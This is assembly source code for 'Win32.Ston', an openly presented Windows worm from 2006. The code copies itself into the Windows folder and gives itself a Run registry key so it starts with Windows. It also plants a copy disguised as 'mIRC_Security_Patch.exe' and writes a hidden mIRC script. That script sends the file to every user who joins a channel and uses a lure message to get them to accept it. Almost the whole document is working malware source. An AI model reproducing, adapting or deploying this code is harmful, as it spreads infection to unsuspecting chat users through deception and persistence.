;--------------------------------------------------------------------+ ;name: Win32.Ston | ;author: Hutley / RRLF | ;date 30.Jun.2006 | ;webpage: www.Hutley.de.vu | ;--------------------------------------------------------------------+ ; *** FEATURES | ; - Start with Windows by Registry | ; - Spread by mIRC using a script file | ; | ; *** THANX | ; - DiA, SPTH, blueowl, dr3f | ; | ; *** COMMENT! | ; My first that spread by mIRC! | ;--------------------------------------------------------------------+ include '%fasminc%\win32ax.inc' .data about db "Win32.Ston by Hutley / RRLF", 0 _windir rb 255d ston_file rb 255d ston_new rb 255d ; registry variables reg_subkey equ "Software\Microsoft\Windows\CurrentVersion\Run", 0 reg_result db ? reg_value equ "Ston", 0 ; infect mIRC mirc_reg equ "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC", 0 mirc_reg_rst db ? mirc_path rb 255d mirc_size db 255d mirc_file equ "\mIRC_Security_Patch.exe", 0 mirc_ston equ "ston.mrc", 0 mirc_ston_hdl dd ? mirc_dccsend db ".dcc send -clm $nick ",0 mirc_content db "; Win32.Ston.Script by Hutley/RRLF",13,10,\ "",13,10,\ "on 1:JOIN:#:if ($nick != $me) }",13,10 mirc_ctnt_size = $ - mirc_content mirc_other db 256 dup(?) mirc_rest db 13,10,".privmsg $nick Accept, its a very nice one!",13,10,"}" mirc_writen dd 0 ;mirc.ini ini_file db 0 .code start: call autostart ; ok! auto start with windows call infect_mirc ; ok! copy in mirc folder call write_mirc.ini ; write in mirc.ini invoke ExitProcess,\ ; that's all folks! 0 .end start proc write_mirc.ini invoke lstrcat,\ ini_file,\ "\mirc.ini" invoke WritePrivateProfileString,\ "rfiles",\ "n2",\ "ston.mrc",\ ini_file ret endp proc infect_mirc invoke RegOpenKeyEx,\ HKEY_LOCAL_MACHINE,\ mirc_reg,\ 0,\ KEY_READ,\ mirc_reg_rst cmp eax, 0 ; any error? jne error ; then exit ; whithout error, then continue invoke RegQueryValueEx,\ dword[mirc_reg_rst],\ "UninstallString",\ 0,\ 0,\ mirc_path,\ mirc_size invoke lstrlen,\ mirc_path mov esi, mirc_path sub eax, 21 ; 12 to mirc.exe | 21 to C:\mirc\ mov byte [esi + eax], 0 inc esi invoke RegCloseKey,\ mirc_reg_rst invoke GetModuleFileName,\ 0,\ ston_file,\ 255d invoke lstrcpy,\ ston_new,\ esi invoke lstrcpy,\ ini_file,\ esi invoke lstrcat,\ ston_new,\ mirc_file invoke lstrcpy,\ mirc_other,\ ".dcc send -clm $nick " invoke lstrcat,\ mirc_other,\ esi invoke lstrcat,\ mirc_other,\ mirc_file invoke CopyFile,\ ; letīs copy in mIRC folder ston_file,\ ston_new,\ FALSE invoke lstrlen,\ ston_new mov esi, ston_new sub eax, 23 mov byte[esi + eax], 0 invoke lstrcat,\ esi,\ mirc_ston invoke CreateFile,\ ; create the script file (ston.mrc) esi,\ GENERIC_WRITE,\ 0,\ 0,\ CREATE_ALWAYS,\ FILE_ATTRIBUTE_HIDDEN,\ 0 cmp eax, INVALID_HANDLE_VALUE ; protection of erros je error ; error? get out! mov dword[mirc_ston_hdl], eax ; handle of file creation in variable invoke WriteFile,\ dword[mirc_ston_hdl],\ mirc_content,\ mirc_ctnt_size,\ mirc_writen,\ 0 invoke lstrlen,\ mirc_other invoke WriteFile,\ dword[mirc_ston_hdl],\ mirc_other,\ eax,\ mirc_writen,\ 0 invoke lstrlen,\ mirc_rest invoke WriteFile,\ dword[mirc_ston_hdl],\ mirc_rest,\ eax,\ mirc_writen,\ 0 invoke CloseHandle,\ dword[mirc_ston_hdl] error: ; if exist error i go to here invoke RegCloseKey,\ ; close the opened key mirc_reg_rst ret endp proc autostart ; auto start the virus by win registry invoke GetWindowsDirectory,\ ; let's copy to windows dir _windir,\ 255d invoke GetModuleFileName,\ 0,\ ston_file,\ 255d invoke lstrcpy,\ ston_new,\ _windir invoke lstrcat,\ ston_new,\ "\WinStone.exe" invoke CopyFile,\ ston_file,\ ston_new,\ FALSE invoke lstrcpy,\ ston_file,\ ston_new invoke RegOpenKeyEx,\ ; add to registry HKEY_LOCAL_MACHINE,\ reg_subkey,\ 0,\ KEY_SET_VALUE,\ reg_result invoke lstrlen,\ ston_file invoke RegSetValueEx,\ dword[reg_result],\ reg_value,\ 0,\ REG_SZ,\ ston_file,\ eax invoke RegCloseKey,\ dword[reg_result] ret endp